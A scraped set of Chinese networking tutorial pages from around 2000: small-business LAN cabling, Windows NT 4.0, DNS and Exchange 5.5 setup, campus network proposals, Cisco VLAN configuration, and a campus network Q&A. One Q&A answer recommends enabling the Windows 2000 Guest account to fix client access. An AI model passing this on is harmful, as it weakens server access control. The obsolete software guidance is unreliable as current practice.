    星型拓扑结构广泛应用于网络管理集中于中央节点的场合,由于分布式计算环境的流行,以集线器/交换机为中心的星型拓扑结构被大量采用。
    鉴于星型网络的这些优点,在这里我们采用星型网络拓扑结构进行局域网的布线。采取交换机-集线器-客户机的星型网络结构，中间的连线采用非屏蔽超五类双绞线。
    考虑到现在网络发展已经有比较成熟的千兆网，我们可以选用10/100M自适应的12口小型交换机作为中央节点放置在中央机房中。每层楼放置一个（或两个）24口的集线器，从主机房交换机处布10条线出来，每层楼两根线（如果每层楼只放置一个HUB，则剩下一根线备用）接至HUB上，每个房间设置一个（或二个）网络接口模块，再将每个房间的网线布到各个对应的HUB处即可。
    局域网布线是当然请网络公司去做了，你只须提出大体设计方案即可。等网线布好后，通过测试，画好图纸，局域网布线就算完成了。

    四、服务器的安装及设置：
    接下来的就是局域网建设中最为关键的一步了。那就是服务器操作系统的选择和安装、DNS配置、邮件服务器的安装和配置等。

    （一）服务器操作系统的选择：
    可以作为网络服务器的操作系统主要有三种：
    一种是基于SUN工作站平台的 Solaris操作系统，一种是基于微机的Linux免费操作系统，一种是基于微机的Windows NT操作系统。
    Solaris操作系统需要SUN工作站的支持，对于没有SUN工作站的小型企业而言，这种方式不太合适（它适合于大型企业，并且稳定性好）；免费的Linux操作系统，虽说是免费的，由于版本太多，技术资料过少，不易操作，也不太适合；因此我们选择微软的Windows NT Server 4.0中文版作为我们的服务器操作系统，它的缺点是不够稳定，资源消耗快，因此，只适合于小型企业，而不适合于大型企业。

    （二）Windows NT Server 4.0中文版操作系统的安装准备工作：
    首先需要创建Windows NT Server安装盘（3张3寸软盘）。具体方法如下：
    1. 将Windows NT Server光盘插入CD-ROM驱动器。如果出现Windows NT CD-ROM窗口，则关掉它。
    2. 进入MS-DOS状态，假设F盘为光驱盘符：
    （1）F: 回车 　　　（2）cd i386 回车 　　　（3）winnt /ox 　　回车
    3. 按屏幕提示，将空磁盘标号为"Windows NT Server 安装盘#3"，插入A驱动器，单击"确定"，安装程序准备#3号盘。
    4. 按屏幕提示，将空磁盘标号为"Windows NT Server 安装盘#2"，插入A驱动器，单击"确定"，安装程序准备#2号盘。
    5. 按屏幕提示：将空磁盘标号为"Windows NT Server 安装引导盘"，插入A驱动器，单击"确定"，安装程序准备引号盘。
    6. 当完成了磁盘准备时，出现命令提示，关闭"命令提示"窗口，取出光盘和软盘。

    （三）安装Windows NT Server 4.0中文版：
    1. 将Windows NT Server 引导盘插入A驱，启动计算机，出现"Windows NT安装程序"画面，下面是安装程序正在装载文件（…）。
    2. 提示插入Windows NT Server 安装盘#2，准备好后按回车。
    3. 出现Windows NT Server安装程序的"欢迎使用安装程序"：
    想多了解Windows NT 的安装过程，按F1， 开始安装Windows NT，按Enter， 修复上次安装时损坏的4.0中文版Windows NT Server，按R， 停止安装Windows NT并退出安装程序，按F3。 按回车。
    4. 提示大容量存储设备检测： 按Enter继续，试图检测计算机中的大容呈存储设备， 跳过大容量存储设备检测，按S。 按回车。
    5. 提示插入Windows NT Server #3号盘，准备好后按回车。
    6. 安装程序检测到下列大容量存储设备：IDE CD-ROM (ATAPI 1.2)/PCI IDE Controller 如果有大容量存储设备的驱动软盘，按S， 没有大容量存储设备的驱动软盘，按Enter。 按回车。
    7. Windows NT许可协议，按Page Down多次阅读许可协议的内容，最后按F8，表示同意协议。
    8. 安装程序检测出计算机内含有下列硬件和软件组合，不更改，则按回车。
    9. 显示磁盘分区： 在突出显示所指的磁盘分区或未分区空间上安装Windows NT，按Enter， 在未分区空间上创建一新的磁盘分区，按C， 删除突出显示所指的磁盘分区，按D。 初次安装时可以将光标移到第一个未分区空间上，按C，回车以确认。如果是再次安装，可以先选取D删除原先的分区（此时提示按D则删除分区，按Esc则不删除此分区），再将光标移到D：新的（未格式化）上，按回车。
    10. 选择NTFS或FAT文件系统： 使用FAT文件系统格式化此磁盘分区， 使用NTFS文件系统格式化此磁盘分区。 作为服务器，从安全及管理方面考虑，我们应该选择NTFS文件系统格式化磁盘。
    11. 安装目录为\winnt，按回车确认。
    12. 安装程序检测硬盘： 允许安装程序在硬盘上执行这种检测，按Enter， 跳过此检测，按Esc。 按回车。
    13. 拷贝文件，显示进度百分比。
    14. 提示取出软盘，按回车，重新启动计算机。
    15. Windows NT安装程序1）收集有关计算机的信息；2）安装Windows NT网络；3）完成安装。按下一步。
    16. 在名称和组织处分别输入"名称"和"组织"， 按下一步。
    17. 注册，在CD码处输入注册码，按下一步。
    18. 许可协议，有"每服务器"和"每客户"两种方式，如果选择前一种，还必须设置有多少个同时连接。安装以后可以单向地将"每服务器"方式改为"每客户"。按下一步。
    19. 在计算机名称处输入该计算机的名称（在局域网中应该是唯一的）， 按下一步。
    20. 服务器类型：主域控制器、备份域控制器、独立的服务器。一般安装第一个Windows NT，可以设为主域控制器，按下一步。
    21. 管理员帐号：（管理员用户名为administrator）密码处输入管理员的密码，在确认密码处再次输入管理员的密码。按下一步。
    22. 紧急修复磁盘： 是，创建一张紧急修复盘， 否，不创建紧急修复磁盘。 先可以不创建，等安装完后再创建，按下一步。
    23. 选取配件，按下一步，按下一步。
    24. 网络连接方式：用线路连接到网络、远程访问网络。按实际选择（一般为线路），按下一步。
    25. 选择"安装Microsoft Internet Information Server"，按下一步。
    26. 网络适配器：按"查找"，显示"3com Etherlink III ISA/PCMCIA卡"，按下一步。
    27. 网络协议：TCP/IP协议、NWLink IPX/SPX兼容传输、NetBEUI通讯协议，可以都选上，按下一步。
    28. 网络服务：Microsoft Internet Information Server 2.0、RPC配置、NetBIOS接口、工作站、服务器。可以都选上，按下一步。
    29. 网卡I/O端地址、中断编号、收发器类型（0x300, 10, 10 Base T），选中缺省值即可，按下一步。
    30. 安装TCP/IP：询问是否使用DHCP服务器（可以自动分配IP地址），选否。
    31. 拷贝文件后，输入TCP/IP属性：选IP地址卡，选"指定IP地址"，在IP在址处输入该机的IP地址，在子网掩码处输入：255.255.255.0，在默认网关处输入路由器的IP地址。选DNS卡，在主机名处输入机器名，在域处输入"域名"（此处为因特网的域名，与Windows NT中的域不同），在DNS服务器搜索顺序处添加域名服务器的IP地址，在域后缀搜索顺序添加域名服务器的域名。按确定。
    32. 显示绑定属于：所有的服务：NetBIOS接口、服务器、工作站。
    33. 创建一个主域控制器：在主机名处输入"主机名"，在域处输入域的名字,按下一步，按完成。
    34. Microsoft Internet Information Server 2.0安装，全选中，安装目录e:\winnt\system32\inetsrv，创建目录。
    35. 发行目录： WWW发行目录：C:\InetPub\wwwroot FTP发行目录：C:\InetPub\ftproot Gopher发行目录：C:\InetPub\gophroot 创建目录。
    36. 安装ODBC驱动程序，点SQL Server，确定。
    37. 日期/时间属性，关闭。
    38. 显示器属性，确定。
    39. 重新启动计算机。
    注意：如果你的计算机中已经安装了Win95，还有另外一种安装方式，它不需要安装软盘，方法如下：
    启动WIN 95，将NT光盘插入光驱，自动运行，出现安装窗，点"Windows NT安装程序"按钮，则出现提示画面（例G:\i386），按回车确认，出现Windows NT Server Setup安装画面，下面有一个进度条表示拷贝程序的进度。当拷贝完之后，出现提示：移去软盘，按回车重新启动计算机（如果按回车后计算机没有重启，可从开始处重新启动计算机）。当计算机重新启动后，出现Windows NT Server安装窗，参见第3步，以后的安装步骤同上，只是没有提示要插入软盘了。）这种安装方法是将安装程序先拷贝到硬盘的某一个临时目录，等Windows NT全部安装完后，再删除该临时目录。

    （四）DNS服务器的设置：

    1、概念：
    （1）DNS：
    即Domain name server（域名服务器），我们知道，联入Internet的每台主机都有一个IP地址，但IP地址是纯数字的，使用起来太枯燥难记，人们于是创建了域名的概念--用形象的单词来代替IP地址，域名服务器的作用就是将域名翻译为计算机能够认识的IP地址，因此，DNS也可称为域名解释服务器。
    （2）Forwarder server:
    每个DNS服务器上都存放着一张域名与IP地址的对照表，当工作站提出域名解释的请求时，本地DNS服务器就去搜寻对照表，查看是否有相匹配的记录，如有，返回对应的IP地址；如无，则应将此查询提交上一级DNS服务器，这就是Forwarder server, 如果最终的DNS服务仍解释不了该域名，则返回一个错误信息。Forwarder server的产生是因为Internet上的域名和IP地址是如此之多，我们没必要也不可能在某一台计算机上建立完整的对照表。
    （3）反向查询：
    DNS服务器通常接受的是将域名解释为IP地址的请求，但有时我们也需要知道与某个IP地址对应的域名是什么，这就是反向查询。

    以下我们将用一个实例来说明如何建立DNS服务器：
    假设DNS服务器是一台已安装好了TCP/IP协议的NT 4.0 server服务器，它有一个固定的IP地址：159.226.171.1，负责解释在域hn.ac.cn内的工作站提交的查询，它的上一级DNS服务器的IP地址是159.226.1.1。

    2、安装DNS服务器：
    在缺省安装NT 4.0时，DNS服务是没有被安装的，我们必须在安装完NT 4.0后手动安装，步骤如下：
    （1） 点"开始--设置--控制面板--网络"，在聘的"网络"窗中选择"TCP/IP协议"。
    （2）点"属性--DNS设置"，在出现的页框在输入相关内容，如：主机名：ns；域：hn.ac.cn；DNS服务器IP地址：159.226.171.1；点"添加"按钮。该IP地址即出现在DNS服务器的搜索列表。
    （3）点"确定"，返回"网络"窗，点"服务--添加"。
    （4）在"选定网络服务"窗口中，选"Microsoft DNS服务器"，点"确定"。
    （5）这时将提示你插入NT安装盘，插盘并给出NT安装文件的正确路径后，点"继续"按钮，开始复制文件。
    （6）文件复制结束后，回到"网络"窗，这时你可以看到在网络栏中多了一项："Microsoft DNS服务器"，点"关闭"。
    （7）重新启动计算机 这时在"管理工具"程序组里将出现一个"DNS管理器"的图标，我们余下的工作将利用这个DNS管理器来完成。

    3、添加DNS服务器：
    （1） 点"开始--程序--管理工具（公用）--DNS管理器"，启动DNS管理器。
    （2）点菜单项"DNS"，在出现的子菜单里选择"新建服务器"，在弹出的对话框中输入"159.226.171.1"，点"确定"。
    （3）左边"服务器清单"窗口即出现"159.226.171.1"这个服务器。

    4、添加DNS服务器管理的域：
    （1） 选中"159.226.171.1"，单击鼠标右键，在出现的菜单项里选"新建区域"。
    （2）"区域类型"选"主要"，点"下一步"。
    （3）"区域名："键入"hn.ac.cn"，按Tab键，"区域文件"处自动出现"hn.ac.cn.dns"，取此默认值，点"下一步"。
    （4） 点"完成"按钮。 这时，在DNS管理器右窗出现域hn.ac.cn，左窗则出现hn.ac.cn的所有记录，类型有NS，SOA，A等，其含义可从NT的帮助中查看到，但你大可不必去理会它们的含义，换了UNIX就不行，你必须了解它们，否则你就如同看天书，这也是NT的优点之一。

    5、添加反向查询域：
    （1）选中"159.226.171.1"，单击鼠标右键，在出现的菜单项里选"新建区域"。
    （2）"区域类型"选"主要"，点"下一步"。
    （3）"区域名："键入"171.226.159.in.addr.arpa"（注意：域名称必须以反向方式输入），按Tab键，"区域文件"处自动出现"171.226.159.in.addr.arpa.dns"，取此默认值，点"下一步"。
    （4）点"完成"按钮。 这时，在DNS管理器右窗出现域171.226.159.in.addr.arpa，左窗则出现171.226.159.in.addr.arpa的所有记录。

    6、Forwarder server服务器设置：
    （1）选中"159.226.171.1"，单击鼠标右键，选"属性"。
    （2）单击"转发器"钮，点"使用转发器"，输入上一级DNS服务器的IP地址：159.226.1.1，点"添加"。
    （3）点"确定"。

    7、建立主机域名与IP地址对照表：
    到现在我们已经建立了一个DNS服务器，但它目前并不起什么作用，因为它的对照表是空的，我们必须添加主机数据来满足DNS工作站的查询要求。
    （1）选中一个域，如hn.ac.cn，单击鼠标右键，选"新建主机"。
    （2）输入"主机名：www1"，"IP地址：159.226.171.2"，选中"创建关联的PTR记录"，建立此主机的反查询记录。
    （3）点"添加主机"按钮，此主机名与IP地址的对照信息即加入到表中。
    （4）同理，依次填入hn.ac.cn这个域内的各个主机的主机名和IP地址，注意别忘了选"创建关联的PTR记录"。
    （5）最后点"确定"退出。 当域中新增主机时，可再用此步骤添加其域名与IP地址的对照信息。

    8、给主机设置别名：
    一个IP地址可对应多个域名吗？答案是肯定的，以如某台计算机即是WWW服务器，以是一个E-MAIL服务器，那么我们可以给它取两个域名：www1.hn.ac.cn和mail.hn.ac.cn，这就涉及到别名问题，设置别名的步骤如下：

    （1）选中一个域，如hn.ac.cn，单击右键，选"新建记录"。
    （2）出现"新建资源记录"窗口，在"记录类型"中选"CNAME记录"，"别名"处输入别名，如mail,"为宿主的DNS名称"处，输入"www1.hn.ac.cn."（注意最后的句点，千万不能省略）
    （3）点"确定"退出。 这样，IP地址159.226.171.2就有两个域名www1.hn.ac.cn和mail.hn.ac.cn，同理可再设置别的域名和设置其它主机的别名。

    9、测试：
    做完以上步骤，重新启动计算机，表面上看似乎没什么变化，但你的NT已经是一台DNS服务器了，你可以测试一下。

    （1）ping命令：用于校验与远程计算机或本地计算机的连接。
    简单步骤如下：先进入MS-DOS方式（即命令提示符），在>状态下键入"ping mail.hn.ac.cn"，如果出现以下信息，则说明连接成功，否则你要检查一下哪个环节出错。 c:\> ping mail.hn.ac.cn Pinging www1.hn.ac.cn[159.226.171.2] with 32 bytes of data: Reply from 159.226.171.2:bytes=32 time=101s TTL=243 Reply from 159.226.171.2:bytes=32 time=102s TTL=243 … 关于ping的详细用法可查询NT帮助系统。
    （2）nslookup命令：这是一个诊断工具，它从域名系统（DNS）名称服务器中显示信息，nslookup有两种工作方式：交互式和非交互式，这里仅介绍交互方式，大家可在NT帮助系统里找到nslookup的详细用法。
    首先进入MS-DOS方式，键入nslookup，出现">"号，如下所示：
    c:\>nslookup
    Default Server: ns
    Address: 159.226.171.1
    >mail.hn.ac.cn
    Server: ns
    Address: 159.226.171.1
    Name: www1.hn.ac.cn
    Address: 159.226.171.2
    Aliases: mail.hn.ac.cn
    >159.226.171.2
    Server: ns
    Address: 159.226.171.1
    Name: www1.hn.ac.cn
    Address: 159.226.171.2
    至此，DNS服务器的设置完成。

    （五）E-mail邮件服务器软件的安装和配置：

    Microsoft Exchange Server是Microsoft BackOffice套件中的一个重要组件，它集E-mail、News等服务于一身，是一个功能强大的服务器软件。你如果没有BackOffice，也可以从网上下载Exchange Server 5.5的评估版，文件名是exch55i.exe，大小23M，不过，你只能使用三个月。在此我们选用Exchange Server 5.5作为邮件服务器软件，当然你可以选择别的邮件服务器软件，例Netscape Mail Server等。

    1、Exchange Server 5.5的安装：
    （1）进入Exchange Server 5.5的安装目录（\exchangeserver55\server\setup\i386），双击setup程序，出现许可协议，点"Accept"按钮。
    （2）出现"安装类型"窗，取默认路径D:\exchsrvr，点"Complete/Custom"大按钮。
    （3）进入"选取组件"窗，选取所有组件，点"Continue"。
    （4）如果IIS正在运行，将会询问你是否要停IIS服务以便让Exchange能继续安装，点"确定"。
    （5）输入产品序列号，此序列号在BackOffice光盘包装盒的背面。
    （6）出现"许可协议"，点"我同意"，点"确定"。
    （7）出现"组织及站点"，选"Create a new site"(如果你的网络上已有一个存在的站点，请选择"Join an existing site"，并输入相应的服务器名)。输入组织名和站点名后，点"OK"继续。
    （8）询问是否建立一个新的站点，点"是（Y）"。
    （9）出现"站点服务帐号"窗，帐号名默认为Administrator，输入口令，点"OK"。
    （10）开始复制文件。
    （11）复制结束后将询问是否进行优化，建议进行，点"Run Optimize"按钮。
    （12）出现"欢迎"窗，点"下一步"继续。
    （13）选择用户数，服务器类型等选项，点"下一步"继续。
    （14）显示"Disk analysis has completed"信息，点"下一步"继续。
    （15）显示Exchange的系统文件目录，此处取默认值，点"下一步"。
    （16）点"完成"按钮。 至此，安装结束。

    2、Exchange Server 5.5的设置：

    Exchange Server所提供的各种服务主要由Exchange Administrator设置完成。
    点"开始"-"程序"-"Microsoft Exchange"-"Microsoft Exchange Administrator"。当首次运行时，将出现连接到服务器的对话框，输入服务器名或点"Browse"按钮选择合适的服务器，选定后，点"OK"。 接着出现Exchange管理器的主菜单。

    Internet mail的设置：
    （1）此项设置主要通过Internet mail向导来完成。点主菜单"File"-"Newother"-"Internet mail Service"，由于有向导的帮助，此项设置甚为简单，除了在E-mail地址生成格式处输入E-mail地址格式，以及输入管理员口令外，其余均点"下一步"即可。
    （2）增加用户信箱：Internet mail设置完成后，就可以为用户设置信箱了，其操作步骤如下：
    1）在管理器左窗口下选中收件人"Recipients"。
    2）点"File"-"New mail box"。
    3）出现信箱属性窗口，你只需要填入First name即可，其余为此信箱用户的信息，属可选项。填 入First name，如Tom，点"Primary windows NT Account"按钮。
    4）出现两个选项，一是"Select an existing windows NT account"（选择一个已存在的帐号），如果该用户已在域用户管理器中拥有帐号，可选此项。二是"create a new windows NY account"（建立一个新帐号），当用户在域用户管理器中无帐号时选此项。
    5）选择其一后，按屏幕提示建立或选择一个帐号，返回属性窗，点"确定"完成此用户信箱的建立。

    重复以下步骤，可为其他用户建立信箱。

    至此，E-mail服务器设置完成，用户可以使用电子邮件软件如Outlook, Foxmail等进行E-mail收发。

    以上介绍了小型企业组建局域的全部过程，希望对那些想组建局域网的小型企业有所帮助。

返回


校 园 网 解 决 方 案

《一键清理系统垃圾》

校 园 网 解 决 方 案

校园网建设的目标主要有两个：
一、是与外界的资源共享和信息共享，如通过Cernet（中教网）与国内外各院校、各部、各省等相连，又如通过Internet与各国相连；

二、校内的资源共享与信息交换，如校园行政管理系统、教学管理系统、各年级师生对图书馆资源的远程检索和资料阅读系统等等。

可以和企业的Internet/Intranet对比，但在应用中由于教学等需要而具有特殊性，如对多媒体教学传输的需求。 因此，我们充分考虑校园网应用需求来确定解决方案。
.......................
系 统 问 题 与 用 户 需 求

１.建立一个校园网综合布线系统
２.建立一套基于 Intranet的学校信息管理系统 主要包括教务、财务等方面的管理功能。实现学生管理、教师管理，教学安排、公文流转、餐务管理、人事考勤管理、财务管理等功能。
３.建立一套高速多媒体校园网教学系统 采用国际先进的数字监控技术和视频流技术，使每个教室都成为多媒体网络教室，具有视频广播、视频点播、轮流监控、遥控、电子白板等功能。
４.具有完善的网络安全机制；
５.能够与原有的单机使用的计算机和独立的小型局域网平滑连接，保护原有的投资。 足够的Internet连接。

方 案 分 析：

1.在此校园网络中主干交换机是Ltnetcomm的千兆骨干LTS6808G,和IP Switch LTP9524x 给网络带来了,极高的背板带宽.其中LTP9524X支持IEEE802.1Q VLAN和IGMP协议,能够 划分VLAN,IP SWITCH的功能能使VLAN之间通信.并且支持VOD系统,使之运行更完美.

2.在每一座楼上放置一台千兆分支交换机.

3.在流量要求不大的地方,采用三级交换到桌面的方式,来扩展端口数量.

4.为使系统运行稳定、连续及安全，在本系统中采用北京科尔茂公司的高性能的数字化在线式UPS---Chroma 9100系列 DSP UPS。其采用DSP、大屏幕液晶显示、智能化电池管理等先进技术，达成UPS的高性能化、高效率化、高可靠度化与智能化。为用户的重要设备提供绝对纯净稳定的不间断电源，结合双变换技术完全隔离不良电源如断电、尖峰、频率漂移、电源下陷、谐波等对设备的损害及防止数据资料的损失，结合智能化电源监控软件，为网络中的服务器、网络设备及用户端设备提供可靠安全完整的电源保护。

5.SuperMicro 8060机架式服务器是采用4U机柜式机箱、支持四路PIII Xeon处理器的具有较高性能及可靠性的互联网机架式服务器，适用于电信、ISP/ICP、证券、金融等行业用户的应用。它专门为服务提供商而精细设计，占地少、布线容易、而且管理和维护方便，用户可以根据自己的需要灵活安装、并且能够并行堆叠服务器，以提高可用性服务。高度集成的设计增强了系统的互操作性，以太网、SCSI、图形与服务器管理控制器均紧密集成于一个平台。互联网机架式服务器是服务提供商的最佳选择，大量的7U服务器可有前端为ISP/ICP的用户提供多种Internet服务，极大地扩充ISP/ICP的业务量。SuperMicro 8060机架式服务器可稳定运行于多种操作系统平台,它所采用的最新技术及高可靠性和高性能确保其能胜任WEB服务器、ERP、电子商务、数据中心服务器及其它关键领域

１.建立一个校园网综合布线系统
２.建立一套基于 Intranet的学校信息管理系统 主要包括教务、财务等方面的管理功能。实现学生管理、教师管理，教学安排、公文流转、餐务管理、人事考勤管理、财务管理等功能。
３.建立一套高速多媒体校园网教学系统 采用国际先进的数字监控技术和视频流技术，使每个教室都成为多媒体网络教室，具有视频广播、视频点播、轮流监控、遥控、电子白板等功能。
４.具有完善的网络安全机制；
５.能够与原有的单机使用的计算机和独立的小型局域网平滑连接，保护原有的投资。 足够的Internet连接。

返回


校园网VLAN的设计和管理

《一键清理系统垃圾》

校园网VLAN的设计和管理

VLAN的设计

1.传统平面结构的校园网设计

高校内部建筑众多，教学科研、行政管理、实验室和机房相对分散，不利于校园内部IP地址的分配。一般来说校园网可以申请到8～32个C类地址(这里假定为202.197.0.0～202.197.7.255)，如果将这些IP地址全部集中到一个路由端口上(如图1)，可能会因为子网中信息广播风暴，影响整个校园网络内部运行效率。

2.VLAN结构的网络设计

为改变平面结构的路由，可在图中Cisco 2511与Switch之间增加一个内部路由设备Cisco 4500和若干个Cisco 5000交换机(如图2)。这样在每个4500的路由端口，可以将一个C类地址作为一个子网，在Cisco 5000上配置12口光纤模块，可以通过光纤延伸到各楼房。

VLAN的实现

以图2为例，要完成VLAN的网络配置，需要在4500路由器和5000交换机分别设置(假设网络按照右表划分)。 子网号
C类地址
端口号
VLAN名

1
202.197.0.*
5000A模块1(1，2)5000B模块1(1)
NIC

2
202.197.1.*
5000A模块2(1，2，3，4)
CA

3
202.197.2.*
5000A模块2(5)
CS

4
202.197.3.*
5000A模块2(6，7)
PHY

5
202.197.4.*
5000A模块2(8，9，10)5000B模块2(1，2，3)
AUTO

6
202.197.5.*
5000B模块2(4，5，6，7)
MATH

●Cisco 4500中VLAN的配置

Interface FastEthernet0.1

/＊建立虚网f0.1～F0.7,f0.1缺省为主干通道＊/

Description NIC

/＊VLAN名称为NIC＊/

IP address 202.197.0.1 255.255.255.0 /＊IP地址为 202.197.0.1，子网掩码为255.255.255.0 ＊/

Encapsulation isl 1

Interface FastEthernet0.2

Description CA

IP address 202.197.1.1 255.255.255.0

Encapsulation isl 2

……

Interface FastEthernet0.6

Description MATH

IP address 202.197.5.1 255.255.255.0

Encapsulation isl 6

● Cisco 5000A中VLAN设置

Set interface sc0 1 202.197.0.3 255.255.255.0 202.197.0.255

/＊给定5000A的IP地址为202.197.0.3，指定访问交换机通过以太网接口＊/

Set vtp domain sw.com mode server

/＊VLAN的管理域名为sw.com，Trunk协议操作模式为server＊/

Set truck 1/1 on 1－6

/＊设置Trunk＊/

Set truck 1/2 on

Set vlan 1 1/1－2

/＊模块1的端口1到2属于子网1＊/

Set vlan 2 2/1－4

Set vlan 3 2/5

Set vlan 4 2/6－7

Set vlan 5 2/8－10

Set vlan 6

/＊定义子网6以便5000B可以使用＊/

● Cisco 5000B中VLAN设置

Set interface sc0 1 202.197.0.4 255.255.255.0 202.197.0.255

Set vtp domain sw.com mode client

/＊Truck协议操作模式为client＊/

Set truck 1/1 on 1－6

Set truck 1/2 on

Set vlan 1 1/1

Set vlan 5 2/1－3

Set vlan 6 2/4－7

VLAN的管理

1.限制IP地址盗用

在交换机中建立一张静态ARP表，绑定IP地址和网卡MAC地址。计算机如果从交换机的一个端口转到另一个端口时必须经过网络管理人员的同意，有利于整个网络的良好管理，以达到有效防止基于IP的网络计费中IP地址盗用的问题。

ARP 202.197.3.180 0800.3c50.8a9f ARPA

2.设置子网访问权限

基于端口的VLAN可以有效地管理和限制虚拟局域网之间的访问，让重要信息得到有效保护，防止非法入侵。各个部门可以各自使用本工作组的资源，增加了网络的安全性。

(config)＃

interface FastEthernet0.2

/＊选取2号子网进行管理＊/

(config－f0.2)＃

ip access－group 8 in

/＊指定可以访问的工作组＊/

(config)＃

access－list 8 permit 202.197.1.240

/＊指定可访问的主机＊/

access－list 8 permit 202.197.4.145

返回


校园网管理问与答

《一键清理系统垃圾》

校园网管理问与答

《中国电脑教育报》伍裕标

    小昕问：在校园网中，能ping通网络，但网页浏览器无法浏览到相应的网页，请问怎样解决这个问题？

    答：一般情况下，中小学校园网一般分成内网和外网两部分。内网中的机器使用内部IP地址，它们均通过代理服务器或其他转接设备连接Internet，因此内网上的浏览器要想正常使用必须要额外添加一些配置，配置方法是（以IE为例）：在IE浏览器上单击右键，选择“属性”菜单；在出现的窗口内单击“连接”标签，再单击[局域网设置]按钮；勾选“为LAN使用代理服务器”，在文本框中输入学校代理服务器的IP地址和端口号；单击[高级]按钮，为不同协议确定代理所用的不同端口号；在“例外”框中输入内网中需通过IE浏览器访问的机器的IP地址；单击一系列[确定]按钮，关闭对话框。另外，在划分了多个子网的校园网内，如果欲访问 Internet的机器和学校代理服务器分布在两个子网上，如果任一个默认网关配置不正确，访问Internet也将会出现访问不到等问题。（江苏 郑兴航）

    xlzx问：我校服务器的操作系统为Windows 2000 Server，局域网中其他电脑的操作系统为Windows 98，它们都能上网，服务器能访问其他电脑，但其他电脑访问服务器时，都会出现一对话框：“请输入网络密码，必须提供密码才能连接……”，可是在服务器上根本没有设置任何密码。请问该怎么解决？

    答：把Windows 2000 Server的Guest用户启用，或者添加学生机的用户名。


校园网解决方案

《一键清理系统垃圾》

校园网解决方案

目 录
1、概述
2、校园网建设的必要性
3、校园网建设的设计目标
4、校园网的总体设计思想
5、校园网建设的整体内容
6、校园网建设的具体内容
  6．1 技术方案设计
  6．1．1 结构化布线与设备选择设计
  6．1．2 网络技术选型设计
    校园网络中心的设计
    教学子网的设计
    办公子网的设计
    图书馆子网的设计
    宿舍区子网及后勤子网等的设计
  6．2 信息系统资源建设
  6．2．1 内部信息资源建设
  6．2．2 外部信息资源建设
7、总结
1、 概述：
    目前，全球已掀起一股信息高速公路规划和建设的高潮，作为其雏形，国际互联网（Internet）上相连的计算机已近达数千万台，全球有数亿人在Internet上进行信息交换和各种业务处理。Internet上积累了大量信息资源，这些资源涉及人类面对和从事的各个领域、行业及社会公用服务信息。成为信息时代全球可共享的最大信息基地。

    中国教育科研计算机网（CERNET）于1994年正式启动以来，已与国内几百所学校相连。为广大师生及科研人员提供了一个全新的网络环境。1998年10月,中国教育科研网(CERNET)二期工程正式启动,工程计划到2000年二期工程完成时,除达到连接1000所大学的目标外,对有条件的中小学也提供接入上网服务。的确,随着信息技术的飞速发展,中小学校园网的建设已经逐渐提到议事日程上来。但是我国目前大多数校园网上的应用还不丰富，与学校原有一些计算机业务系统还没有充分发挥，应用水平的低下是对校园网资源的极大浪费。只有提高校园网上的应用水平，才能切实提高学校各项业务水平，适应信息时代的要求。因而，如何利用当前先进的计算机技术与校园网资源，实现学校各项业务系统的集成，提高应用水平将是学校校园网建设的下一个工作重点。

    当前由于网络、数据库及与之相关的应用技术不断发展，尤其国际互联网（Internet）和内部网（Intranet）技术的广泛应用，世界正在迈入网络中心计算（Network Centric Computing）时代。人们传统的交互和工作模式正在改变。处在不同地理位置的人们可以共享数据，使用群件技术（GroupWare）进而能够协同工作；多媒体数据的存储、传输、应用技术的不断成熟；以上这些计算机技术的发展对学校传统的计算机业务系统产生影响，使用户能更方便。更直观的使用系统，也使系统的性能更完善、功能更强大。

    校园网建设的目标简而言之是将校园内各种不同应用的信息资源通过高性能的网络设备相互连接起来，形成校园园区内部的Intranet系统，对外通过路由设备接入广域网。 建设校园网对每个学校来说都不是一件容易的事情,都要经过周密的论证、谨慎的决策和紧张的施工。当一堆设备变成网络的时候,大部分学校的满腔热情也慢慢地冷却凝固。校园网建成了,各种问题也不断涌现:设计目标根本无法实现,没有合适的应用软件,许多设想根本无法实施,后续的维护费用不堪承受等等。

2、 校园网建设的必要性：
    是否在学校采用最先进的信息和传播技术是一个有决定性意义的问题,而且十分重要的是,学校应该处于影响整个社会深刻变革的中心地位。

    随着计算机多媒体和网络技术的不断发展与普及，校园网信息系统的建设，是非常必要的，也是可行的。

主要表现在：
1、当前校园网信息系统已经发展到了与校际互联、国际互联、静态资源共享、动态信息发布、远程教学和协作工作的阶段，发展对学校教育现代化的建设提出了越来越高的要求。
2、教育信息量的不断增多,使各级各类学校、家庭和教育管理部门对教育信息计算机管理和教育信息服务的要求越来越强烈。个人是否具有获得信息和处理信息的能力对于能否成功进入职业界和融入社会及文化环境都是个决定性的因素,因此学校应该培养所有学生具有驾驭和掌握这种技术的能力。另一方面,信息技术在作为青少年教育工具的同时也向青少年提供了前所未有的机会。新技术提供的机会以及它们在教学方面具有的优势都是很多的,特别是计算机和多媒体系统的使用有助于个人化的道路,每个学生在个人的学习道路上都可以按照自己的速度发展。
3、我国各级教育研究部门、软件开发单位、教学设备供应商和各级学校不断开发提供了各种在网络上运行的软件及多媒体系统，并且越来越形象化、实用化，迫切需要网络环境。
4、现代教育改革的需要。在校园网中将计算机引入教学各个环节，从而引起了教学方法，教学手段，教学工具的重大革新。对提高教学质量，推动我国教育现代化的发展起着不可估量的作用。网络又为学校的管理者和老师提供了获取资源、协同工作的有效途径。毫无疑问,校园网是学校提高管理水平、工作效率、改善教学质量的有力手段,是解决信息时代教育问题的基本工具。
5、随着经济发展，我国各级政府对教育的投入不断加大；计算机技术的飞速发展，使相应产品价格不断下降；同时人们的认识水平和经济实力不断提高。大量计算机进入学校和家庭，使得计算机用于教育信息管理和信息服务是完全可行的。

3、 校园网的设计目标:
    由于校园网是一个新概念,在国内发展还不成熟,所以无论是学校、媒体,还是计算机业界,对校园网都缺乏全面深入的理解和认识,并都带有一定的盲目性和偏见,不知道校园网应该起什么作用。

    校园网缺乏相应的应用软件。现在所谓的校园网多是一些系统集成商基于先进的硬件设备提出的解决方案,是设备集成。由于网络技术是一门比较新的技术,致使许多人产生了"重视硬件,轻视软件"的想法,国内斥资开发这方面软件的企业也很少,造成了软件匮乏的局面。只注重有形的网络的建设而忽略了无形的文化的建设是校园网失败的最关键的原因。这里所指的"无形的文化"是指人们的观念、工作方式、利益结构、学校的管理运作模式等看不见、摸不着的东西。从某种意义上讲,校园网的建设绝不仅仅只是涉及到技术问题,而是会引起更深层次的变革,也就是说信息技术所带来的一场革命会彻底改变我们的生活方式和工作方式。

